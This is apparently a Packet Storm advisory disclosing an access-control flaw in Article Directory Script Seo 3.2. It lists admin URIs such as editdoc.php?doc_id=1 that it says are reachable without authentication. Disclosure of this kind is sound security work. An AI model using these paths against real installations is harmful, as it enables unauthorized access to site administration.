Article Directory Script Seo 3.2 Insecure Direct Object Reference

2017-01-15T00:00:00
ID PACKETSTORM:140509
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-01-15T00:00:00

Description

                                        
                                            `# # # # #   
# Vulnerability: Improper Access Restrictions   
# Date: 15.01.2017  
# Vendor Homepage: http://www.e-soft24.com/  
# Script Name: Article Directory Script Seo  
# Script Version: V3.2  
# Script Buy Now: http://www.e-soft24.com/article-directory-script-seo-p-338.html  
# Author: Adeghsan Aencan  
# Author Web: http://ihsan.net  
# Mail : ihsan[beygir]ihsan[nokta]net  
# # # # #   
# Direct entrance..  
# An attacker can exploit this issue via a browser.  
# The following example URIs are available:  
# http://localhost/[PATH]/admin/alldoc.php  
# http://localhost/[PATH]/admin/editdoc.php  
# http://localhost/[PATH]/admin/editdoc.php?doc_id=1  
# Vs.......  
# # # # #  
  
`